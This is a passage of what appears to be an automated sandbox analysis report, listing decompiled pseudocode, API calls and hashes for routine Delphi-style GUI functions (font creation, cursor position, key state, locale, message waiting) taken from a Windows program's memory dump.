                                                                        					return GetObjectA( *(_t20 - 0x10), 0x54,  *(_t20 + 0xc));
                                                                        				}
                                                                        				return _t13;
                                                                        			}







                                                                        APIs
                                                                        • DeleteObject.GDI32(?), ref: 00424000
                                                                        • DeleteDC.GDI32(?), ref: 00424020
                                                                        • 72E7B380.USER32(00000000,?,?,0042404D), ref: 0042402B
                                                                        • GetObjectA.GDI32(?,00000054,?), ref: 00424040
                                                                        Similarity
                                                                        • API ID: DeleteObject$B380
                                                                        • String ID:
                                                                        • API String ID: 2559486108-0
                                                                        • Opcode ID: d882ca4a59d74ba7fcd23cff5cfbfdf04719c013bf3bc46bbc777ebace02f49a
                                                                        • Instruction ID: 234183355323d449e4e0ea259c9d81100d714ff255df05ef953365b2e2b4a470
                                                                        • Opcode Fuzzy Hash: d882ca4a59d74ba7fcd23cff5cfbfdf04719c013bf3bc46bbc777ebace02f49a
                                                                        • Instruction Fuzzy Hash: 29E0C071A04115AADB10EBE5D846A7E77F8EF44305F41446AB610E71C1C67DA850C729
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004072D8(void* __eax, int __ecx, long __edx) {
                                                                        				void* _t2;
                                                                        				void* _t4;
                                                                        
                                                                        				_t2 = GlobalHandle(__eax);
                                                                        				GlobalUnWire(_t2);
                                                                        				_t4 = GlobalReAlloc(_t2, __edx, __ecx);
                                                                        				GlobalFix(_t4);
                                                                        				return _t4;
                                                                        			}






                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Global$AllocHandleWire
                                                                        • String ID:
                                                                        • API String ID: 2210401237-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 83%
                                                                        			E004348FC(intOrPtr __eax, intOrPtr __ecx, intOrPtr __edx, void* __fp0) {
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr* _v12;
                                                                        				struct tagPOINT _v20;
                                                                        				intOrPtr _v24;
                                                                        				char _v28;
                                                                        				char _v36;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				intOrPtr _t54;
                                                                        				intOrPtr _t60;
                                                                        				intOrPtr _t65;
                                                                        				intOrPtr _t71;
                                                                        				intOrPtr _t74;
                                                                        				intOrPtr _t88;
                                                                        				intOrPtr _t105;
                                                                        				intOrPtr _t115;
                                                                        				intOrPtr _t116;
                                                                        				intOrPtr _t120;
                                                                        				intOrPtr _t123;
                                                                        				intOrPtr _t124;
                                                                        				intOrPtr _t129;
                                                                        				void* _t133;
                                                                        				intOrPtr _t134;
                                                                        				void* _t137;
                                                                        
                                                                        				_t137 = __fp0;
                                                                        				_v8 = __ecx;
                                                                        				_t88 = __edx;
                                                                        				_t124 = __eax;
                                                                        				 *0x496b88 = __eax;
                                                                        				_push(_t133);
                                                                        				_push(0x434aa1);
                                                                        				_push( *[fs:edx]);
                                                                        				 *[fs:edx] = _t134;
                                                                        				_v12 = 0;
                                                                        				 *0x496b90 = 0;
                                                                        				_t135 =  *((char*)(__eax + 0x9b));
                                                                        				if( *((char*)(__eax + 0x9b)) != 0) {
                                                                        					E004037D8(__eax, __eflags);
                                                                        					__eflags =  *0x496b88;
                                                                        					if( *0x496b88 != 0) {
                                                                        						__eflags = _v12;
                                                                        						if(_v12 == 0) {
                                                                        							_v12 = E00433CD8(1, _t124);
                                                                        							 *0x496b90 = 1;
                                                                        						}
                                                                        						_t128 =  *((intOrPtr*)(_v12 + 0x38));
                                                                        						_t105 =  *0x4323f0; // 0x43243c
                                                                        						_t54 = E00403768( *((intOrPtr*)(_v12 + 0x38)), _t105);
                                                                        						__eflags = _t54;
                                                                        						if(_t54 == 0) {
                                                                        							_t129 =  *((intOrPtr*)(_v12 + 0x38));
                                                                        							__eflags =  *((intOrPtr*)(_t129 + 0x30));
                                                                        							if( *((intOrPtr*)(_t129 + 0x30)) != 0) {
                                                                        								L14:
                                                                        								__eflags = 0;
                                                                        								E00412BA4(0,  &_v36, 0, _t124, _t129);
                                                                        								E004360C4(_t129,  &_v28,  &_v36);
                                                                        								_t60 = _v12;
                                                                        								 *((intOrPtr*)(_t60 + 0x44)) = _v28;
                                                                        								 *((intOrPtr*)(_t60 + 0x48)) = _v24;
                                                                        								L15:
                                                                        								_t130 = _v12;
                                                                        								_t125 =  *((intOrPtr*)(_v12 + 0x38));
                                                                        								__eflags =  *(_v12 + 0x44) +  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x38)) + 0x48));
                                                                        								E00412BA4( *(_v12 + 0x44) +  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x38)) + 0x48)),  &_v28,  *((intOrPtr*)(_v12 + 0x48)) +  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x38)) + 0x4c)), _t125, _t130);
                                                                        								_t65 = _v12;
                                                                        								 *((intOrPtr*)(_t65 + 0x4c)) = _v28;
                                                                        								 *((intOrPtr*)(_t65 + 0x50)) = _v24;
                                                                        								goto L16;
                                                                        							}
                                                                        							_t116 =  *0x4323f0; // 0x43243c
                                                                        							_t71 = E00403768(_t129, _t116);
                                                                        							__eflags = _t71;
                                                                        							if(_t71 != 0) {
                                                                        								goto L14;
                                                                        							}
                                                                        							GetCursorPos( &_v20);
                                                                        							_t74 = _v12;
                                                                        							 *(_t74 + 0x44) = _v20.x;
                                                                        							 *((intOrPtr*)(_t74 + 0x48)) = _v20.y;
                                                                        							goto L15;
                                                                        						} else {
                                                                        							GetWindowRect(E0043CC2C(_t128), _v12 + 0x44);
                                                                        							L16:
                                                                        							asm("movsd");
                                                                        							asm("movsd");
                                                                        							asm("movsd");
                                                                        							asm("movsd");
                                                                        							L17:
                                                                        							E0043478C(_v12, _v8, _t88, _t133, _t137);
                                                                        							_pop(_t115);
                                                                        							 *[fs:eax] = _t115;
                                                                        							return 0;
                                                                        						}
                                                                        					}
                                                                        					_pop(_t120);
                                                                        					 *[fs:eax] = _t120;
                                                                        					return 0;
                                                                        				}
                                                                        				E004037D8(__eax, _t135);
                                                                        				if( *0x496b88 != 0) {
                                                                        					__eflags = _v12;
                                                                        					if(_v12 == 0) {
                                                                        						_v12 = E00433BC0(_t124, 1);
                                                                        						 *0x496b90 = 1;
                                                                        					}
                                                                        					goto L17;
                                                                        				}
                                                                        				_pop(_t123);
                                                                        				 *[fs:eax] = _t123;
                                                                        				return 0;
                                                                        			}





























                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: <$C
                                                                        • API String ID: 0-3423417450
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 79%
                                                                        			E0041F478(void* __eax, void* __ebx, void* __ecx) {
                                                                        				signed int _v8;
                                                                        				struct tagLOGFONTA _v68;
                                                                        				char _v72;
                                                                        				char _v76;
                                                                        				char _v80;
                                                                        				intOrPtr _t76;
                                                                        				intOrPtr _t81;
                                                                        				void* _t107;
                                                                        				void* _t116;
                                                                        				intOrPtr _t126;
                                                                        				void* _t137;
                                                                        				void* _t138;
                                                                        				intOrPtr _t139;
                                                                        
                                                                        				_t137 = _t138;
                                                                        				_t139 = _t138 + 0xffffffb4;
                                                                        				_v80 = 0;
                                                                        				_v76 = 0;
                                                                        				_v72 = 0;
                                                                        				_t116 = __eax;
                                                                        				_push(_t137);
                                                                        				_push(0x41f601);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t139;
                                                                        				_v8 =  *((intOrPtr*)(__eax + 0x10));
                                                                        				if( *((intOrPtr*)(_v8 + 8)) != 0) {
                                                                        					 *[fs:eax] = 0;
                                                                        					_push(E0041F608);
                                                                        					return E0040436C( &_v80, 3);
                                                                        				} else {
                                                                        					_t76 =  *0x496a74; // 0x2150658
                                                                        					E0041E7FC(_t76);
                                                                        					_push(_t137);
                                                                        					_push(0x41f5d9);
                                                                        					_push( *[fs:eax]);
                                                                        					 *[fs:eax] = _t139;
                                                                        					if( *((intOrPtr*)(_v8 + 8)) == 0) {
                                                                        						_v68.lfHeight =  *(_v8 + 0x14);
                                                                        						_v68.lfWidth = 0;
                                                                        						_v68.lfEscapement = 0;
                                                                        						_v68.lfOrientation = 0;
                                                                        						if(( *(_v8 + 0x19) & 0x00000001) == 0) {
                                                                        							_v68.lfWeight = 0x190;
                                                                        						} else {
                                                                        							_v68.lfWeight = 0x2bc;
                                                                        						}
                                                                        						_v68.lfItalic = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000002) != 0x00000000;
                                                                        						_v68.lfUnderline = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000004) != 0x00000000;
                                                                        						_v68.lfStrikeOut = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000008) != 0x00000000;
                                                                        						_v68.lfCharSet =  *((intOrPtr*)(_v8 + 0x1a));
                                                                        						E004045A4( &_v72, _v8 + 0x1b);
                                                                        						if(E0040864C(_v72, "Default") != 0) {
                                                                        							E004045A4( &_v80, _v8 + 0x1b);
                                                                        							E00408C90( &(_v68.lfFaceName), _v80);
                                                                        						} else {
                                                                        							E004045A4( &_v76, "\rMS Sans Serif");
                                                                        							E00408C90( &(_v68.lfFaceName), _v76);
                                                                        						}
                                                                        						_v68.lfQuality = 0;
                                                                        						_v68.lfOutPrecision = 0;
                                                                        						_v68.lfClipPrecision = 0;
                                                                        						_t107 = E0041F75C(_t116) - 1;
                                                                        						if(_t107 == 0) {
                                                                        							_v68.lfPitchAndFamily = 2;
                                                                        						} else {
                                                                        							if(_t107 == 1) {
                                                                        								_v68.lfPitchAndFamily = 1;
                                                                        							} else {
                                                                        								_v68.lfPitchAndFamily = 0;
                                                                        							}
                                                                        						}
                                                                        						 *((intOrPtr*)(_v8 + 8)) = CreateFontIndirectA( &_v68);
                                                                        					}
                                                                        					_pop(_t126);
                                                                        					 *[fs:eax] = _t126;
                                                                        					_push(0x41f5e0);
                                                                        					_t81 =  *0x496a74; // 0x2150658
                                                                        					return E0041E808(_t81);
                                                                        				}
                                                                        			}

















                                                                        APIs
                                                                          • Part of subcall function 0041E7FC: RtlEnterCriticalSection.KERNEL32(?,0041E839), ref: 0041E800
                                                                        • CreateFontIndirectA.GDI32(?), ref: 0041F5B6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CreateCriticalEnterFontIndirectSection
                                                                        • String ID: MS Sans Serif$Default
                                                                        • API String ID: 2931345757-2137701257
                                                                        • Opcode ID: 29ecfd2846ab71fec9c4193a5fb4111e2c3dc0bae6f8b124e61999baa7fe3b75
                                                                        • Instruction ID: c6d3fcb0f525e24af73f531a10b58b6f758537922a732ded3b048f0f413673bb
                                                                        • Opcode Fuzzy Hash: 29ecfd2846ab71fec9c4193a5fb4111e2c3dc0bae6f8b124e61999baa7fe3b75
                                                                        • Instruction Fuzzy Hash: 28516E30A04248DFDB01CFA9C541BCDBBF6AF49304F2580BAD804A7352D3789E96CB69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 65%
                                                                        			E00409A84(void* __ebx, void* __edi, void* __esi) {
                                                                        				int _v8;
                                                                        				signed int _v12;
                                                                        				char _v16;
                                                                        				char _v20;
                                                                        				char _v24;
                                                                        				char _v28;
                                                                        				void* _t53;
                                                                        				void* _t54;
                                                                        				intOrPtr _t80;
                                                                        				void* _t83;
                                                                        				void* _t84;
                                                                        				void* _t86;
                                                                        				void* _t87;
                                                                        				intOrPtr _t90;
                                                                        
                                                                        				_t89 = _t90;
                                                                        				_push(0);
                                                                        				_push(0);
                                                                        				_push(0);
                                                                        				_push(0);
                                                                        				_push(0);
                                                                        				_push(0);
                                                                        				_push(_t90);
                                                                        				_push(0x409b97);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t90;
                                                                        				_v8 = GetThreadLocale();
                                                                        				_t53 = 1;
                                                                        				_t86 = 0x496758;
                                                                        				_t83 = 0x496788;
                                                                        				do {
                                                                        					_t3 = _t53 + 0x44; // 0x45
                                                                        					E00409A48(_t3 - 1, _t53 - 1,  &_v16, 0xb, _t89);
                                                                        					E0040439C(_t86, _v16);
                                                                        					_t6 = _t53 + 0x38; // 0x39
                                                                        					E00409A48(_t6 - 1, _t53 - 1,  &_v20, 0xb, _t89);
                                                                        					E0040439C(_t83, _v20);
                                                                        					_t53 = _t53 + 1;
                                                                        					_t83 = _t83 + 4;
                                                                        					_t86 = _t86 + 4;
                                                                        				} while (_t53 != 0xd);
                                                                        				_t54 = 1;
                                                                        				_t87 = 0x4967b8;
                                                                        				_t84 = 0x4967d4;
                                                                        				do {
                                                                        					_t8 = _t54 + 5; // 0x6
                                                                        					asm("cdq");
                                                                        					_v12 = _t8 % 7;
                                                                        					E00409A48(_v12 + 0x31, _t54 - 1,  &_v24, 6, _t89);
                                                                        					E0040439C(_t87, _v24);
                                                                        					E00409A48(_v12 + 0x2a, _t54 - 1,  &_v28, 6, _t89);
                                                                        					E0040439C(_t84, _v28);
                                                                        					_t54 = _t54 + 1;
                                                                        					_t84 = _t84 + 4;
                                                                        					_t87 = _t87 + 4;
                                                                        				} while (_t54 != 8);
                                                                        				_pop(_t80);
                                                                        				 *[fs:eax] = _t80;
                                                                        				_push(E00409B9E);
                                                                        				return E0040436C( &_v28, 4);
                                                                        			}


















                                                                        APIs
                                                                        • GetThreadLocale.KERNEL32(00000000,00409B97,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409AA0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: LocaleThread
                                                                        • String ID: 4w@$<v@
                                                                        • API String ID: 635194068-2181857394
                                                                        • Opcode ID: 031ed5dcb529cad3d0294120807776f5ada001c53162cb20b0110185eb27f802
                                                                        • Instruction ID: 8564910674612e7aa7f8c9bef030902903e116a4d87ded3b75f7abf6dfca8640
                                                                        • Opcode Fuzzy Hash: 031ed5dcb529cad3d0294120807776f5ada001c53162cb20b0110185eb27f802
                                                                        • Instruction Fuzzy Hash: A0319871F001085BDB00DA95D881AAE77ADEBC8314F61807BFA09E7782D63DED018769
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 71%
                                                                        			E004438EC(intOrPtr __eax, void* __ebx, void* __ecx, void* __edx, void* __esi) {
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr _v12;
                                                                        				intOrPtr _v16;
                                                                        				intOrPtr* _v20;
                                                                        				intOrPtr _t32;
                                                                        				intOrPtr _t52;
                                                                        				void* _t57;
                                                                        				intOrPtr _t69;
                                                                        				intOrPtr _t76;
                                                                        				void* _t78;
                                                                        				void* _t80;
                                                                        				void* _t81;
                                                                        				intOrPtr _t82;
                                                                        
                                                                        				_t80 = _t81;
                                                                        				_t82 = _t81 + 0xfffffff0;
                                                                        				_t78 = __ecx;
                                                                        				_t57 = __edx;
                                                                        				_v8 = __eax;
                                                                        				_v16 = E004242CC(1);
                                                                        				_push(_t80);
                                                                        				_push(0x4439eb);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t82;
                                                                        				if( *((char*)(_v8 + 0x41)) == 0) {
                                                                        					L3:
                                                                        					_push(0);
                                                                        					_push(E004436F8(_v8, _v16, _t57, __eflags));
                                                                        					_t32 = E004436E8(_v8);
                                                                        					L00426AA8();
                                                                        					_v12 = _t32;
                                                                        					__eflags = 0;
                                                                        					_t69 = _t32;
                                                                        					 *[fs:eax] = _t69;
                                                                        					_push(0x4439f2);
                                                                        					return E004035DC(_v16);
                                                                        				} else {
                                                                        					_t84 = _t78 - 0xffffffff;
                                                                        					if(_t78 == 0xffffffff) {
                                                                        						goto L3;
                                                                        					} else {
                                                                        						_v20 = E004242CC(1);
                                                                        						 *[fs:eax] = _t82;
                                                                        						 *((intOrPtr*)( *_v20 + 8))( *[fs:eax], 0x4439ad, _t80);
                                                                        						E00425838(_v20, _t78);
                                                                        						E0044351C(_v8);
                                                                        						_push(E004436D8( *((intOrPtr*)( *_v20 + 0x68))()));
                                                                        						_push(E004436F8(_v8, _v16, _t57, _t84));
                                                                        						_t52 =  *((intOrPtr*)(_v8 + 0x3c));
                                                                        						L00426AA8();
                                                                        						_v12 = _t52;
                                                                        						_t76 = _t52;
                                                                        						 *[fs:eax] = _t76;
                                                                        						_push(0x4439d5);
                                                                        						return E004035DC(_v20);
                                                                        					}
                                                                        				}
                                                                        			}

















                                                                        APIs
                                                                        • 734520C0.COMCTL32(?,00000000,00000000,?,00000000,004439EB), ref: 0044398F
                                                                        • 734520C0.COMCTL32(00000000,00000000,00000000,00000000,004439EB), ref: 004439CD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: 734520
                                                                        • String ID: DA
                                                                        • API String ID: 3632036016-2080325668
                                                                        • Opcode ID: ccd8e2105615a610abee5b20ed0fe88bc36b8bc16ea5897006935c09f0e991ca
                                                                        • Instruction ID: 32eae90527f60b3240dfe4ecec9ccfcab97337b482669b5735be93bbf68b5d75
                                                                        • Opcode Fuzzy Hash: ccd8e2105615a610abee5b20ed0fe88bc36b8bc16ea5897006935c09f0e991ca
                                                                        • Instruction Fuzzy Hash: 75318470B00215AFEB00EF6AC88295EB7F9FB49715B6144B6F414E73A1CB74AE00CB18
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 72%
                                                                        			E004499B4(intOrPtr __eax, void* __edx) {
                                                                        				char _v8;
                                                                        				signed short _v10;
                                                                        				intOrPtr _v16;
                                                                        				char _v17;
                                                                        				char _v24;
                                                                        				intOrPtr _t34;
                                                                        				intOrPtr _t40;
                                                                        				intOrPtr _t42;
                                                                        				intOrPtr _t48;
                                                                        				void* _t51;
                                                                        				intOrPtr _t64;
                                                                        				intOrPtr _t67;
                                                                        				void* _t69;
                                                                        				void* _t71;
                                                                        				intOrPtr _t72;
                                                                        
                                                                        				_t69 = _t71;
                                                                        				_t72 = _t71 + 0xffffffec;
                                                                        				_t51 = __edx;
                                                                        				_v16 = __eax;
                                                                        				_v10 =  *((intOrPtr*)(__edx + 4));
                                                                        				if(_v10 == 0) {
                                                                        					return 0;
                                                                        				} else {
                                                                        					if(GetKeyState(0x10) < 0) {
                                                                        						_v10 = _v10 + 0x2000;
                                                                        					}
                                                                        					if(GetKeyState(0x11) < 0) {
                                                                        						_v10 = _v10 + 0x4000;
                                                                        					}
                                                                        					if(( *(_t51 + 0xb) & 0x00000020) != 0) {
                                                                        						_v10 = _v10 + 0x8000;
                                                                        					}
                                                                        					_v24 =  *((intOrPtr*)(_v16 + 0x34));
                                                                        					_t34 =  *0x496bf8; // 0x2150880
                                                                        					E004268F8(_t34,  &_v24);
                                                                        					_push(_t69);
                                                                        					_push(0x449ab2);
                                                                        					_push( *[fs:eax]);
                                                                        					 *[fs:eax] = _t72;
                                                                        					while(1) {
                                                                        						_v17 = 0;
                                                                        						_v8 = E004496B8(_v16, 2, _v10 & 0x0000ffff);
                                                                        						if(_v8 != 0) {
                                                                        							break;
                                                                        						}
                                                                        						if(_v24 == 0 || _v17 != 2) {
                                                                        							_pop(_t64);
                                                                        							 *[fs:eax] = _t64;
                                                                        							_push(0x449ab9);
                                                                        							_t40 =  *0x496bf8; // 0x2150880
                                                                        							return E004268F0(_t40);
                                                                        						} else {
                                                                        							continue;
                                                                        						}
                                                                        						goto L14;
                                                                        					}
                                                                        					_t42 =  *0x496bf8; // 0x2150880
                                                                        					E004268F8(_t42,  &_v8);
                                                                        					_push(_t69);
                                                                        					_push(0x449a87);
                                                                        					_push( *[fs:eax]);
                                                                        					 *[fs:eax] = _t72;
                                                                        					_v17 = E00449860( &_v8, 0, _t69);
                                                                        					_pop(_t67);
                                                                        					 *[fs:eax] = _t67;
                                                                        					_push(0x449a8e);
                                                                        					_t48 =  *0x496bf8; // 0x2150880
                                                                        					return E004268F0(_t48);
                                                                        				}
                                                                        				L14:
                                                                        			}

                                                                        APIs
                                                                        • GetKeyState.USER32(00000010), ref: 004499D8
                                                                        • GetKeyState.USER32(00000011), ref: 004499EA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: State
                                                                        • String ID:
                                                                        • API String ID: 1649606143-3916222277
                                                                        • Opcode ID: 94615d3298e6c2b1289478aca6bd501869d773b40b841513df6d38ea5f5749f1
                                                                        • Instruction ID: 784b168bbd6622d86c8817c47da5e1e24199c79018d4424b72d08e920171472a
                                                                        • Opcode Fuzzy Hash: 94615d3298e6c2b1289478aca6bd501869d773b40b841513df6d38ea5f5749f1
                                                                        • Instruction Fuzzy Hash: 7A31D670A04384EFEB11EFA6D81169FB7F5EB45304F9684BBE800B6291E7785E00D658
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 71%
                                                                        			E00456CA0(intOrPtr __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                        				intOrPtr _v8;
                                                                        				char _v9;
                                                                        				char _v16;
                                                                        				char _v20;
                                                                        				intOrPtr _t36;
                                                                        				long _t41;
                                                                        				intOrPtr _t51;
                                                                        				void* _t55;
                                                                        				intOrPtr _t66;
                                                                        				intOrPtr* _t67;
                                                                        				intOrPtr _t68;
                                                                        				void* _t74;
                                                                        				void* _t75;
                                                                        				intOrPtr _t76;
                                                                        
                                                                        				_t74 = _t75;
                                                                        				_t76 = _t75 + 0xfffffff0;
                                                                        				_v16 = 0;
                                                                        				_v20 = 0;
                                                                        				_v8 = __eax;
                                                                        				_push(_t74);
                                                                        				_push(0x456dae);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t76;
                                                                        				_t55 = E00456C1C(_v8);
                                                                        				if( *((char*)(_v8 + 0x88)) != 0) {
                                                                        					_t51 = _v8;
                                                                        					_t79 =  *((intOrPtr*)(_t51 + 0x48));
                                                                        					if( *((intOrPtr*)(_t51 + 0x48)) == 0) {
                                                                        						E004571F4(_v8);
                                                                        					}
                                                                        				}
                                                                        				E00454DA8(_t55,  &_v20);
                                                                        				E00433724(_v20, 0,  &_v16, _t79);
                                                                        				_t36 =  *0x496c04; // 0x2150d40
                                                                        				E00456E5C(_t36, _v16, _t79);
                                                                        				_v9 = 1;
                                                                        				_push(_t74);
                                                                        				_push(0x456d57);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t76;
                                                                        				if( *((short*)(_v8 + 0xea)) != 0) {
                                                                        					 *((intOrPtr*)(_v8 + 0xe8))();
                                                                        				}
                                                                        				if(_v9 != 0) {
                                                                        					E00456BB8();
                                                                        				}
                                                                        				_pop(_t66);
                                                                        				 *[fs:eax] = _t66;
                                                                        				_t41 = GetCurrentThreadId();
                                                                        				_t67 =  *0x495c4c; // 0x496030
                                                                        				if(_t41 ==  *_t67 && E0041C0B0() != 0) {
                                                                        					_v9 = 0;
                                                                        				}
                                                                        				if(_v9 != 0) {
                                                                        					WaitMessage();
                                                                        				}
                                                                        				_pop(_t68);
                                                                        				 *[fs:eax] = _t68;
                                                                        				_push(E00456DB5);
                                                                        				return E0040436C( &_v20, 2);
                                                                        			}

                                                                        APIs
                                                                          • Part of subcall function 00456C1C: GetCursorPos.USER32 ref: 00456C25
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00456D6C
                                                                        • WaitMessage.USER32(00000000,00456DAE,?,?,?,004798C4), ref: 00456D8E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CurrentCursorMessageThreadWait
                                                                        • String ID: 0`I
                                                                        • API String ID: 535285469-2983702033
                                                                        • Opcode ID: fd7b748d22305817f75c0356da75bbd64efc841958b29063c3cd77700d717242
                                                                        • Instruction ID: 01c0c099075671609aed48f59db28b1b43af4afac0b60e9a9ce997fa6d685819
                                                                        • Opcode Fuzzy Hash: fd7b748d22305817f75c0356da75bbd64efc841958b29063c3cd77700d717242
                                                                        • Instruction Fuzzy Hash: 0731D830A04248DFDB11DFA5C846B9EB7F5EB45305FA284BAEC00A7352D7796E48CB19
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 71%
                                                                        			E00424370(intOrPtr __eax, void* __edx, void* __edi) {
                                                                        				intOrPtr _v8;
                                                                        				char _v92;
                                                                        				void* __ebx;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				void* _t41;
                                                                        				void* _t43;
                                                                        				intOrPtr _t52;
                                                                        				intOrPtr _t57;
                                                                        				void* _t59;
                                                                        				void* _t60;
                                                                        				void* _t61;
                                                                        				void* _t64;
                                                                        				void* _t66;
                                                                        				intOrPtr _t67;
                                                                        
                                                                        				_t59 = __edi;
                                                                        				_t64 = _t66;
                                                                        				_t67 = _t66 + 0xffffffa8;
                                                                        				_push(_t60);
                                                                        				_t43 = __edx;
                                                                        				_v8 = __eax;
                                                                        				if(__edx == 0) {
                                                                        					L2:
                                                                        					_push(0x496a44);
                                                                        					L004068AC();
                                                                        					_push(_t64);
                                                                        					_push(0x424428);
                                                                        					_push( *[fs:eax]);
                                                                        					 *[fs:eax] = _t67;
                                                                        					if(_t43 == 0) {
                                                                        						E00402EF0( &_v92, 0x54);
                                                                        						E00424D94(_v8, _t43, 0, 0, _t59, _t60, 0, 0,  &_v92);
                                                                        					} else {
                                                                        						_t61 = _t43;
